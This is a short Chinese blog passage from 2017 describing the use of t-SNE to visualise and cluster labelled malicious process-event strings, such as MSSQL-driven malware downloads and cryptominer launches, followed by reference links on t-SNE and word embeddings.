我們的目標是觀察我們的輸入數據集自身是否具備一定的空間拓朴結構,因此我們需要一份label過的數據集(黑白樣本都需要),其中包含一定種類的數據。但是在實做的時候,遇到一個問題。對於黑樣本(已知的攻擊方式)我們可以有明確的label,但是對於龐大的白樣本,我們不知道怎樣去label,雖然在無監督聚類中沒有label不會影響最終的目的,但是在t-SNE中,如果沒有label我們從visual上直觀地看出哪個類與哪個類被區分開了,因此我最后決定只使用黑樣本來進行降維可視化分類

t-SNE降維后得到的結果如下

在2維平面空間上,不同種類的event proc字符串在一定程度上被分成了不同的族群,我們zooming一個細節來看

t-SNE把mssql下載惡意文件以及挖礦程序啟動的事件在空間上分開了
Relevant Link:
http://www.datakit.cn/blog/2017/02/05/t_sne_full.html https://github.com/karpathy/tsnejs https://lvdmaaten.github.io/tsne/ https://www.tensorflow.org/versions/r0.12/how_tos/summaries_and_tensorboard/ http://projector.tensorflow.org/ http://distill.pub/2016/misread-tsne/ https://nlp.stanford.edu/projects/glove/ http://nlp.yvespeirsman.be/blog/visualizing-word-embeddings-with-tsne/ https://www.quora.com/How-do-I-visualise-word2vec-word-vectors http://nadbordrozd.github.io/blog/2016/05/20/text-classification-with-word2vec/ http://minimaxir.com/2017/04/char-embeddings/
Copyright (c) 2017 LittleHann All rights reserved




